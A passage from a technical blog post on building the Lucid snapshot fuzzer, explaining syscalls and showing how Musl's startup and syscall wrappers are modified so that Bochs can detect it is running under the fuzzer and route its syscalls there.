fuzzer-to-Bochs, but for now let’s focus on syscalls.</p>

<p>This fuzzer was conceived of and implemented originally by <a href="https://twitter.com/gamozolabs">Brandon Falk</a>.</p>

<p>There will be no repo changes with this post.</p>

<h2 id="syscalls">Syscalls</h2>
<p><a href="https://wiki.osdev.org/System_Calls">Syscalls</a> are a way for userland to voluntarily context switch to kernel-mode in order to utilize some kernel-provided utility or function. Context switching simply means changing the context in which code is executing. When you’re adding integers or reading/writing memory, your process is executing in user-mode within your process’s virtual address space. But if you want to open a socket or file, you need the kernel’s help. To do this, you make a syscall which will tell the processor to switch execution modes from user-mode to kernel-mode. In order to leave user-mode, go to kernel-mode, and then return to user-mode, a lot of care must be taken to accurately save the execution state at every step. Once you try to execute a syscall, the first thing the OS has to do is save your current execution state before it starts executing your requested kernel code. That way, once the kernel is done with your request, it can return gracefully to executing your user-mode process.</p>

<p>Context-switching can be thought of as switching from executing one process to another. In our case, we’re switching from Bochs execution to Lucid execution. Bochs is doing its thing, reading/writing memory, doing arithmetic, etc., but when it needs the kernel’s help it attempts to make a syscall. When this occurs we need to:</p>

<ol>
  <li>recognize that Bochs is trying to syscall; weirdly, this isn’t always easy to do</li>
  <li>intercept execution and redirect to the appropriate code path</li>
  <li>save Bochs’ execution state</li>
  <li>execute our Lucid logic in place of the kernel, think of Lucid as Bochs’ kernel</li>
  <li>return gracefully to Bochs by restoring its state</li>
</ol>
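
<p>To make steps 3 through 5 a bit more concrete, here is a toy sketch in C. Everything in it is made up for illustration: <code class="language-plaintext highlighter-rouge">toy_regs_t</code> is a tiny stand-in for the real register state, and <code class="language-plaintext highlighter-rouge">toy_handler</code> plays the role of Lucid’s logic. It is not how Lucid actually does it, it just shows the save, handle, restore shape:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include &lt;string.h&gt;

// Toy register file; the real execution state is far larger and this layout
// is purely hypothetical
typedef struct {
    long rax;
    long rdi;
    long rsi;
    long rdx;
} toy_regs_t;

// Stand-in for the Lucid-side handler: it is free to trash the live registers
// while it works, and it hands back a result for the caller
static long toy_handler(toy_regs_t *live) {
    long n = live-&gt;rax;                 // syscall number arrives in rax
    memset(live, 0xAA, sizeof(*live));  // simulate clobbering everything
    return n * 2;                       // arbitrary fake result
}

// Steps 3-5 from the list above
static void toy_context_switch(toy_regs_t *live) {
    toy_regs_t saved = *live;           // 3. save the caller's state
    long ret = toy_handler(live);       // 4. run our logic instead of the kernel
    *live = saved;                      // 5. restore the caller's state
    live-&gt;rax = ret;                    // the result comes back in rax
}
</code></pre></div></div>

<p>After <code class="language-plaintext highlighter-rouge">toy_context_switch</code> returns, every register except <code class="language-plaintext highlighter-rouge">rax</code> looks untouched from the caller’s point of view, which is exactly the illusion the kernel maintains for a real syscall.</p>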

<h2 id="c-library">C Library</h2>
<p>Normally programmers don’t have to worry about making syscalls directly. They instead use functions that are defined and implemented in a C library, and it’s these functions that actually make the syscalls. You can think of these functions as wrappers around a syscall. For instance, if you use the C library function for <code class="language-plaintext highlighter-rouge">open</code>, you’re not directly making a syscall; you’re calling into the library’s <code class="language-plaintext highlighter-rouge">open</code> function, and that function is the one emitting a <code class="language-plaintext highlighter-rouge">syscall</code> instruction that actually performs the context switch into the kernel. Doing things this way takes a lot of the portability work off of the programmer’s shoulders because the guts of the library functions perform all of the conditional checks for environmental variables and execute accordingly. Programmers just call the <code class="language-plaintext highlighter-rouge">open</code> function and don’t have to worry about things like syscall numbers, error handling, etc., as those things are kept abstracted and uniform in the code exported to the programmer.</p>
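
<p>As a quick illustration of the wrapper idea, here is a small Linux-only sketch that asks for the process ID two ways: once through the <code class="language-plaintext highlighter-rouge">getpid</code> wrapper, and once by naming the syscall number ourselves via the generic <code class="language-plaintext highlighter-rouge">syscall</code> function. The helper names are just ones I picked for the example:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#define _GNU_SOURCE
#include &lt;sys/syscall.h&gt;
#include &lt;unistd.h&gt;

// Ask for our PID through the C library wrapper; we never see a syscall number
static long pid_via_wrapper(void) {
    return (long)getpid();
}

// Ask for our PID by passing the syscall number ourselves; this is roughly the
// detail the wrapper hides from us
static long pid_via_syscall_number(void) {
    return syscall(SYS_getpid);
}
</code></pre></div></div>

<p>Both helpers should return the same value. Even the second one still goes through a C library function to reach the <code class="language-plaintext highlighter-rouge">syscall</code> instruction, so in ordinary code the library sits between the program and the kernel either way.</p>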

<p>This provides a nice chokepoint for our purposes, since Bochs programmers also use C library functions instead of invoking syscalls directly. When Bochs wants to make a syscall, it’s going to call a C library function. This gives us an opportunity to <em>intercept</em> these syscalls before they are made. We can insert our own logic into these functions that checks whether or not Bochs is executing under Lucid and, if it is, directs execution to Lucid instead of the kernel. In pseudocode we can achieve something like the following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>fn syscall()
  if lucid:
    lucid_syscall()
  else:
    normal_syscall()
</code></pre></div></div>
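
<p>Spelled out in C, that pseudocode could look something like the sketch below. To be clear, this is not the Musl patch itself: <code class="language-plaintext highlighter-rouge">sketch_ctx_t</code> is a hypothetical, stripped-down context, and both syscall paths are stubs that only report which route was taken so the dispatch is easy to observe:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include &lt;stddef.h&gt;

// Hypothetical, stripped-down context; the real one carries much more state
typedef struct sketch_ctx {
    long last_syscall;  // records the last syscall number routed to "Lucid"
} sketch_ctx_t;

// NULL when running normally, non-NULL when running under Lucid
static sketch_ctx_t *g_lucid_ctx = NULL;

// Markers so a caller can tell which path handled the request
enum { VIA_KERNEL = 1, VIA_LUCID = 2 };

// Stub for the normal path, where the real `syscall` instruction would live
static int normal_syscall(long n) {
    (void)n;
    return VIA_KERNEL;
}

// Stub for the Lucid path, where we would context switch into the fuzzer
static int lucid_syscall(sketch_ctx_t *ctx, long n) {
    ctx-&gt;last_syscall = n;
    return VIA_LUCID;
}

// The chokepoint: one runtime check on the global decides where we go
static int do_syscall(long n) {
    if (g_lucid_ctx != NULL) {
        return lucid_syscall(g_lucid_ctx, n);
    }
    return normal_syscall(n);
}
</code></pre></div></div>

<p>With <code class="language-plaintext highlighter-rouge">g_lucid_ctx</code> left NULL, <code class="language-plaintext highlighter-rouge">do_syscall</code> takes the normal path; once the pointer is set, every call is routed to the Lucid stub without the caller changing anything.</p>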

<h2 id="musl">Musl</h2>
<p><a href="https://musl.libc.org/">Musl</a> is a C library that is meant to be “lightweight.” This gives us some simplicity to work with vs. something like Glibc, which is a monstrosity and an affront to God. Importantly, Musl has a great reputation for static linking, which is what we need when we build our static PIE Bochs. So the idea here is that we can manually alter Musl code to change how syscall-invoking wrapper functions work so that we can hijack execution in a way that context-switches into Lucid rather than the kernel.</p>

<p>In this post we’ll be working with Musl 1.2.4 which is the latest version as of today.</p>

<h2 id="baby-steps">Baby Steps</h2>
<p>Instead of jumping straight into Bochs, we’ll be using a test program for the purposes of developing our first context-switching routines. This is just easier. The test program is this:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;unistd.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;lucid.h&gt;</span><span class="cp">
</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span><span class="n">argv</span><span class="p">[])</span> <span class="p">{</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"Argument count: %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">argc</span><span class="p">);</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"Args:</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">argc</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"   -%s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">argv</span><span class="p">[</span><span class="n">i</span><span class="p">]);</span>
    <span class="p">}</span>

    <span class="kt">size_t</span> <span class="n">iters</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
    <span class="k">while</span> <span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"Test alive!</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
        <span class="n">sleep</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
        <span class="n">iters</span><span class="o">++</span><span class="p">;</span>

        <span class="k">if</span> <span class="p">(</span><span class="n">iters</span> <span class="o">==</span> <span class="mi">5</span><span class="p">)</span> <span class="p">{</span> <span class="k">break</span><span class="p">;</span> <span class="p">}</span>
    <span class="p">}</span>

    <span class="n">printf</span><span class="p">(</span><span class="s">"g_lucid_ctx: %p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">g_lucid_ctx</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The program will just tell us its argument count, print each argument, stay alive for ~5 seconds, and then print the memory address of a Lucid execution context data structure. This data structure will be allocated and initialized by Lucid if the program is running under Lucid, and it will be NULL otherwise. So how do we accomplish this?</p>

<h2 id="execution-context-tracking">Execution Context Tracking</h2>
<p>Our problem is that we need a globally accessible way for the program we load (eventually Bochs) to tell whether it’s running under Lucid or running as normal. We also have to provide many data structures and function addresses to Bochs, so we need a vehicle to do that.</p>

<p>What I’ve done is I’ve just created my own header file and placed it in Musl called <code class="language-plaintext highlighter-rouge">lucid.h</code>. This file defines all of the Lucid-specific data structures we need Bochs to have access to when it’s compiled against Musl. So in the header file right now we’ve defined a <code class="language-plaintext highlighter-rouge">lucid_ctx</code> data structure, and we’ve also created a global instance of one called <code class="language-plaintext highlighter-rouge">g_lucid_ctx</code>:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// An execution context definition that we use to switch contexts between the</span>
<span class="c1">// fuzzer and Bochs. This should contain all of the information we need to track</span>
<span class="c1">// all of the mutable state between snapshots that we need such as file data.</span>
<span class="c1">// This has to be consistent with LucidContext in context.rs</span>
<span class="k">typedef</span> <span class="k">struct</span> <span class="n">lucid_ctx</span> <span class="p">{</span>
    <span class="c1">// This must always be the first member of this struct</span>
    <span class="kt">size_t</span> <span class="n">exit_handler</span><span class="p">;</span>
    <span class="kt">int</span> <span class="n">save_inst</span><span class="p">;</span>
    <span class="kt">size_t</span> <span class="n">save_size</span><span class="p">;</span>
    <span class="kt">size_t</span> <span class="n">lucid_save_area</span><span class="p">;</span>
    <span class="kt">size_t</span> <span class="n">bochs_save_area</span><span class="p">;</span>
    <span class="k">struct</span> <span class="n">register_bank</span> <span class="n">register_bank</span><span class="p">;</span>
    <span class="kt">size_t</span> <span class="n">magic</span><span class="p">;</span>
<span class="p">}</span> <span class="n">lucid_ctx_t</span><span class="p">;</span>

<span class="c1">// Pointer to the global execution context, if running inside Lucid, this will</span>
<span class="c1">// point to a lucid_ctx_t inside the fuzzer</span>
<span class="n">lucid_ctx_t</span> <span class="o">*</span><span class="n">g_lucid_ctx</span><span class="p">;</span>
</code></pre></div></div>
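
<p>Since we rely on <code class="language-plaintext highlighter-rouge">exit_handler</code> being the first member, it can be worth making the compiler enforce that. Below is a minimal sketch of the idea using <code class="language-plaintext highlighter-rouge">offsetof</code> and a C11 <code class="language-plaintext highlighter-rouge">_Static_assert</code>. The <code class="language-plaintext highlighter-rouge">register_bank</code> layout here is a placeholder I made up so the example compiles on its own, and the helper function name is hypothetical:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include &lt;stddef.h&gt;

// Placeholder only: the real register_bank layout is not shown here
struct register_bank {
    size_t placeholder[16];
};

typedef struct lucid_ctx {
    // This must always be the first member of this struct
    size_t exit_handler;
    int save_inst;
    size_t save_size;
    size_t lucid_save_area;
    size_t bochs_save_area;
    struct register_bank register_bank;
    size_t magic;
} lucid_ctx_t;

// Fails the build if someone ever moves exit_handler away from offset 0
_Static_assert(offsetof(lucid_ctx_t, exit_handler) == 0,
               "exit_handler must be the first member of lucid_ctx_t");

// Runtime form of the same check: a pointer to the struct and a pointer to
// its first member should be the same address
static int ctx_starts_with_exit_handler(const lucid_ctx_t *ctx) {
    return (const void *)ctx == (const void *)&amp;ctx-&gt;exit_handler;
}
</code></pre></div></div>

<p>This only guards the C side. The Rust definition has to agree on field order and layout too, which presumably means declaring it with <code class="language-plaintext highlighter-rouge">#[repr(C)]</code>, since Rust’s default struct layout does not promise to keep fields in declaration order.</p>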

<h2 id="program-start-under-lucid">Program Start Under Lucid</h2>
<p>So in Lucid’s main function right now we do the following:</p>
<ul>
  <li>Load Bochs</li>
  <li>Create an execution context</li>
  <li>Jump to Bochs’ entry point and start executing</li>
</ul>

<p>When we jump to Bochs’ entry point, one of the earliest functions called is a function in Musl called <code class="language-plaintext highlighter-rouge">_dlstart_c</code> located in the source file <code class="language-plaintext highlighter-rouge">dlstart.c</code>. Right now, we create that global execution context in Lucid on the heap, and then we pass its address in the arbitrarily chosen <code class="language-plaintext highlighter-rouge">r15</code> register. This whole function will have to change eventually because we’ll want to context switch from Lucid to Bochs to perform this in the future, but for now this is all we do:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">pub</span> <span class="k">fn</span> <span class="nf">start_bochs</span><span class="p">(</span><span class="n">bochs</span><span class="p">:</span> <span class="n">Bochs</span><span class="p">,</span> <span class="n">context</span><span class="p">:</span> <span class="nb">Box</span><span class="o">&lt;</span><span class="n">LucidContext</span><span class="o">&gt;</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// rdx: we have to clear this register as the ABI specifies that exit</span>
    <span class="c1">// hooks are set when rdx is non-null at program start</span>
    <span class="c1">//</span>
    <span class="c1">// rax: arbitrarily used as a jump target to the program entry</span>
    <span class="c1">//</span>
    <span class="c1">// rsp: Rust does not allow you to use 'rsp' explicitly with in(), so we</span>
    <span class="c1">// have to manually set it with a `mov`</span>
    <span class="c1">//</span>
    <span class="c1">// r15: holds a pointer to the execution context, if this value is non-</span>
    <span class="c1">// null, then Bochs learns at start time that it is running under Lucid</span>
    <span class="c1">//</span>
    <span class="c1">// We don't really care about execution order as long as we specify clobbers</span>
    <span class="c1">// with out/lateout, that way the compiler doesn't allocate a register we </span>
    <span class="c1">// then immediately clobber</span>
    <span class="k">unsafe</span> <span class="p">{</span>
        <span class="nd">asm!</span><span class="p">(</span>
            <span class="s">"xor rdx, rdx"</span><span class="p">,</span>
            <span class="s">"mov rsp, {0}"</span><span class="p">,</span>
            <span class="s">"mov r15, {1}"</span><span class="p">,</span>
            <span class="s">"jmp rax"</span><span class="p">,</span>
            <span class="k">in</span><span class="p">(</span><span class="n">reg</span><span class="p">)</span> <span class="n">bochs</span><span class="py">.rsp</span><span class="p">,</span>
            <span class="k">in</span><span class="p">(</span><span class="n">reg</span><span class="p">)</span> <span class="nn">Box</span><span class="p">::</span><span class="nf">into_raw</span><span class="p">(</span><span class="n">context</span><span class="p">),</span>
            <span class="k">in</span><span class="p">(</span><span class="s">"rax"</span><span class="p">)</span> <span class="n">bochs</span><span class="py">.entry</span><span class="p">,</span>
            <span class="nf">lateout</span><span class="p">(</span><span class="s">"rax"</span><span class="p">)</span> <span class="n">_</span><span class="p">,</span>   <span class="c1">// Clobber (lateout so no conflict with the in above)</span>
            <span class="nf">out</span><span class="p">(</span><span class="s">"rdx"</span><span class="p">)</span> <span class="n">_</span><span class="p">,</span>       <span class="c1">// Clobber</span>
            <span class="nf">out</span><span class="p">(</span><span class="s">"r15"</span><span class="p">)</span> <span class="n">_</span><span class="p">,</span>       <span class="c1">// Clobber</span>
        <span class="p">);</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>So when we jump to Bochs’ entry point having come from Lucid, <code class="language-plaintext highlighter-rouge">r15</code> should hold the address of the execution context. In <code class="language-plaintext highlighter-rouge">_dlstart_c</code>, we can check <code class="language-plaintext highlighter-rouge">r15</code> and act accordingly. Here are the additions I made to Musl’s start routine:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">hidden</span> <span class="kt">void</span> <span class="nf">_dlstart_c</span><span class="p">(</span><span class="kt">size_t</span> <span class="o">*</span><span class="n">sp</span><span class="p">,</span> <span class="kt">size_t</span> <span class="o">*</span><span class="n">dynv</span><span class="p">)</span>
<span class="p">{</span>
	<span class="c1">// The start routine is handled in inline assembly in arch/x86_64/crt_arch.h</span>
	<span class="c1">// so we can just do this here. That function logic clobbers only a few</span>
	<span class="c1">// registers, so we can have the Lucid loader pass the address of the </span>
	<span class="c1">// Lucid context in r15, this is obviously not the cleanest solution but</span>
	<span class="c1">// it works for our purposes</span>
	<span class="kt">size_t</span> <span class="n">r15</span><span class="p">;</span>
	<span class="n">__asm__</span> <span class="n">__volatile__</span><span class="p">(</span>
		<span class="s">"mov %%r15, %0"</span> <span class="o">:</span> <span class="s">"=r"</span><span class="p">(</span><span class="n">r15</span><span class="p">)</span>
	<span class="p">);</span>

	<span class="c1">// If r15 was not 0, set the global context address for the g_lucid_ctx that</span>
	<span class="c1">// is in the Rust fuzzer</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">r15</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
		<span class="n">g_lucid_ctx</span> <span class="o">=</span> <span class="p">(</span><span class="n">lucid_ctx_t</span> <span class="o">*</span><span class="p">)</span><span class="n">r15</span><span class="p">;</span>

		<span class="c1">// We have to make sure this is true, we rely on this</span>
		<span class="k">if</span> <span class="p">((</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="n">g_lucid_ctx</span> <span class="o">!=</span> <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">g_lucid_ctx</span><span class="o">-&gt;</span><span class="n">exit_handler</span><span class="p">)</span> <span class="p">{</span>
			<span class="n">__asm__</span> <span class="n">__volatile__</span><span class="p">(</span><span class="s">"int3"</span><span class="p">);</span>
		<span class="p">}</span>
	<span class="p">}</span>

	<span class="c1">// We didn't get a g_lucid_ctx, so we can just run normally</span>
	<span class="k">else</span> <span class="p">{</span>
		<span class="n">g_lucid_ctx</span> <span class="o">=</span> <span class="p">(</span><span class="n">lucid_ctx_t</span> <span class="o">*</span><span class="p">)</span><span class="mi">0</span><span class="p">;</span>
	<span class="p">}</span>
</code></pre></div></div>

<p>When this function is called, <code class="language-plaintext highlighter-rouge">r15</code> remains untouched by the earliest Musl logic. So we use inline assembly to extract the value into a variable called <code class="language-plaintext highlighter-rouge">r15</code> and check it for data. If it has data, we set the global context variable to the address in <code class="language-plaintext highlighter-rouge">r15</code>; otherwise we explicitly set it to NULL and run as normal. Now with a global set, we can do runtime checks for our environment and optionally call into the real kernel or into Lucid.</p>

<h2 id="lobotomizing-musl-syscalls">Lobotomizing Musl Syscalls</h2>
<p>Now with our global set, it’s time to edit the functions responsible for making syscalls. Musl is very well organized so finding the syscall invoking logic was not too difficult. For our target architecture, which is x86_64, those syscall invoking functions are in <code class="language-plaintext highlighter-rouge">arch/x86_64/syscall_arch.h</code>. They are organized by how many arguments the syscall takes:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kr">__inline</span> <span class="kt">long</span> <span class="nf">__syscall0</span><span class="p">(</span><span class="kt">long</span> <span class="n">n</span><span class="p">)</span>
<span class="p">{</span>
	<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">ret</span><span class="p">;</span>
	<span class="n">__asm__</span> <span class="n">__volatile__</span> <span class="p">(</span><span class="s">"syscall"</span> <span class="o">:</span> <span class="s">"=a"</span><span class="p">(</span><span class="n">ret</span><span class="p">)</span> <span class="o">:</span> <span class="s">"a"</span><span class="p">(</span><span class="n">n</span><span class="p">)</span> <span class="o">:</span> <span class="s">"rcx"</span><span class="p">,</span> <span class="s">"r11"</span><span class="p">,</span> <span class="s">"memory"</span><span class="p">);</span>
	<span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
<span class="p">}</span>

<span class="k">static</span> <span class="kr">__inline</span> <span class="kt">long</span> <span class="nf">__syscall1</span><span class="p">(</span><span class="kt">long</span> <span class="n">n</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a1</span><span class="p">)</span>
<span class="p">{</span>
	<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">ret</span><span class="p">;</span>
	<span class="n">__asm__</span> <span class="n">__volatile__</span> <span class="p">(</span><span class="s">"syscall"</span> <span class="o">:</span> <span class="s">"=a"</span><span class="p">(</span><span class="n">ret</span><span class="p">)</span> <span class="o">:</span> <span class="s">"a"</span><span class="p">(</span><span class="n">n</span><span class="p">),</span> <span class="s">"D"</span><span class="p">(</span><span class="n">a1</span><span class="p">)</span> <span class="o">:</span> <span class="s">"rcx"</span><span class="p">,</span> <span class="s">"r11"</span><span class="p">,</span> <span class="s">"memory"</span><span class="p">);</span>
	<span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
<span class="p">}</span>

<span class="k">static</span> <span class="kr">__inline</span> <span class="kt">long</span> <span class="nf">__syscall2</span><span class="p">(</span><span class="kt">long</span> <span class="n">n</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a1</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a2</span><span class="p">)</span>
<span class="p">{</span>
	<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">ret</span><span class="p">;</span>
	<span class="n">__asm__</span> <span class="n">__volatile__</span> <span class="p">(</span><span class="s">"syscall"</span> <span class="o">:</span> <span class="s">"=a"</span><span class="p">(</span><span class="n">ret</span><span class="p">)</span> <span class="o">:</span> <span class="s">"a"</span><span class="p">(</span><span class="n">n</span><span class="p">),</span> <span class="s">"D"</span><span class="p">(</span><span class="n">a1</span><span class="p">),</span> <span class="s">"S"</span><span class="p">(</span><span class="n">a2</span><span class="p">)</span>
						  <span class="o">:</span> <span class="s">"rcx"</span><span class="p">,</span> <span class="s">"r11"</span><span class="p">,</span> <span class="s">"memory"</span><span class="p">);</span>
	<span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
<span class="p">}</span>

<span class="k">static</span> <span class="kr">__inline</span> <span class="kt">long</span> <span class="nf">__syscall3</span><span class="p">(</span><span class="kt">long</span> <span class="n">n</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a1</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a2</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a3</span><span class="p">)</span>
<span class="p">{</span>
	<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">ret</span><span class="p">;</span>
	<span class="n">__asm__</span> <span class="n">__volatile__</span> <span class="p">(</span><span class="s">"syscall"</span> <span class="o">:</span> <span class="s">"=a"</span><span class="p">(</span><span class="n">ret</span><span class="p">)</span> <span class="o">:</span> <span class="s">"a"</span><span class="p">(</span><span class="n">n</span><span class="p">),</span> <span class="s">"D"</span><span class="p">(</span><span class="n">a1</span><span class="p">),</span> <span class="s">"S"</span><span class="p">(</span><span class="n">a2</span><span class="p">),</span>
						  <span class="s">"d"</span><span class="p">(</span><span class="n">a3</span><span class="p">)</span> <span class="o">:</span> <span class="s">"rcx"</span><span class="p">,</span> <span class="s">"r11"</span><span class="p">,</span> <span class="s">"memory"</span><span class="p">);</span>
	<span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
<span class="p">}</span>

<span class="k">static</span> <span class="kr">__inline</span> <span class="kt">long</span> <span class="nf">__syscall4</span><span class="p">(</span><span class="kt">long</span> <span class="n">n</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a1</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a2</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a3</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a4</span><span class="p">)</span>
<span class="p">{</span>
	<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">ret</span><span class="p">;</span>
	<span class="k">register</span> <span class="kt">long</span> <span class="n">r10</span> <span class="n">__asm__</span><span class="p">(</span><span class="s">"r10"</span><span class="p">)</span> <span class="o">=</span> <span class="n">a4</span><span class="p">;</span>
	<span class="n">__asm__</span> <span class="n">__volatile__</span> <span class="p">(</span><span class="s">"syscall"</span> <span class="o">:</span> <span class="s">"=a"</span><span class="p">(</span><span class="n">ret</span><span class="p">)</span> <span class="o">:</span> <span class="s">"a"</span><span class="p">(</span><span class="n">n</span><span class="p">),</span> <span class="s">"D"</span><span class="p">(</span><span class="n">a1</span><span class="p">),</span> <span class="s">"S"</span><span class="p">(</span><span class="n">a2</span><span class="p">),</span>
						  <span class="s">"d"</span><span class="p">(</span><span class="n">a3</span><span class="p">),</span> <span class="s">"r"</span><span class="p">(</span><span class="n">r10</span><span class="p">)</span><span class="o">:</span> <span class="s">"rcx"</span><span class="p">,</span> <span class="s">"r11"</span><span class="p">,</span> <span class="s">"memory"</span><span class="p">);</span>
	<span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
<span class="p">}</span>

<span class="k">static</span> <span class="kr">__inline</span> <span class="kt">long</span> <span class="nf">__syscall5</span><span class="p">(</span><span class="kt">long</span> <span class="n">n</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a1</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a2</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a3</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a4</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a5</span><span class="p">)</span>
<span class="p">{</span>
	<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">ret</span><span class="p">;</span>
	<span class="k">register</span> <span class="kt">long</span> <span class="n">r10</span> <span class="n">__asm__</span><span class="p">(</span><span class="s">"r10"</span><span class="p">)</span> <span class="o">=</span> <span class="n">a4</span><span class="p">;</span>
	<span class="k">register</span> <span class="kt">long</span> <span class="n">r8</span> <span class="n">__asm__</span><span class="p">(</span><span class="s">"r8"</span><span class="p">)</span> <span class="o">=</span> <span class="n">a5</span><span class="p">;</span>
	<span class="n">__asm__</span> <span class="n">__volatile__</span> <span class="p">(</span><span class="s">"syscall"</span> <span class="o">:</span> <span class="s">"=a"</span><span class="p">(</span><span class="n">ret</span><span class="p">)</span> <span class="o">:</span> <span class="s">"a"</span><span class="p">(</span><span class="n">n</span><span class="p">),</span> <span class="s">"D"</span><span class="p">(</span><span class="n">a1</span><span class="p">),</span> <span class="s">"S"</span><span class="p">(</span><span class="n">a2</span><span class="p">),</span>
						  <span class="s">"d"</span><span class="p">(</span><span class="n">a3</span><span class="p">),</span> <span class="s">"r"</span><span class="p">(</span><span class="n">r10</span><span class="p">),</span> <span class="s">"r"</span><span class="p">(</span><span class="n">r8</span><span class="p">)</span> <span class="o">:</span> <span class="s">"rcx"</span><span class="p">,</span> <span class="s">"r11"</span><span class="p">,</span> <span class="s">"memory"</span><span class="p">);</span>
	<span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
<span class="p">}</span>

<span class="k">static</span> <span class="kr">__inline</span> <span class="kt">long</span> <span class="nf">__syscall6</span><span class="p">(</span><span class="kt">long</span> <span class="n">n</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a1</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a2</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a3</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a4</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a5</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a6</span><span class="p">)</span>
<span class="p">{</span>
	<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">ret</span><span class="p">;</span>
	<span class="k">register</span> <span class="kt">long</span> <span class="n">r10</span> <span class="n">__asm__</span><span class="p">(</span><span class="s">"r10"</span><span class="p">)</span> <span class="o">=</span> <span class="n">a4</span><span class="p">;</span>
	<span class="k">register</span> <span class="kt">long</span> <span class="n">r8</span> <span class="n">__asm__</span><span class="p">(</span><span class="s">"r8"</span><span class="p">)</span> <span class="o">=</span> <span class="n">a5</span><span class="p">;</span>
	<span class="k">register</span> <span class="kt">long</span> <span class="n">r9</span> <span class="n">__asm__</span><span class="p">(</span><span class="s">"r9"</span><span class="p">)</span> <span class="o">=</span> <span class="n">a6</span><span class="p">;</span>
	<span class="n">__asm__</span> <span class="n">__volatile__</span> <span class="p">(</span><span class="s">"syscall"</span> <span class="o">:</span> <span class="s">"=a"</span><span class="p">(</span><span class="n">ret</span><span class="p">)</span> <span class="o">:</span> <span class="s">"a"</span><span class="p">(</span><span class="n">n</span><span class="p">),</span> <span class="s">"D"</span><span class="p">(</span><span class="n">a1</span><span class="p">),</span> <span class="s">"S"</span><span class="p">(</span><span class="n">a2</span><span class="p">),</span>
						  <span class="s">"d"</span><span class="p">(</span><span class="n">a3</span><span class="p">),</span> <span class="s">"r"</span><span class="p">(</span><span class="n">r10</span><span class="p">),</span> <span class="s">"r"</span><span class="p">(</span><span class="n">r8</span><span class="p">),</span> <span class="s">"r"</span><span class="p">(</span><span class="n">r9</span><span class="p">)</span> <span class="o">:</span> <span class="s">"rcx"</span><span class="p">,</span> <span class="s">"r11"</span><span class="p">,</span> <span class="s">"memory"</span><span class="p">);</span>
	<span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

